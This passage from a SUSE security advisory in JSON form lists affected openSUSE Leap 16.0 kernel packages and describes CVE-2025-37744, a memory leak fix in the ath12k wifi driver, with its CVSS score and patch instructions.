"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
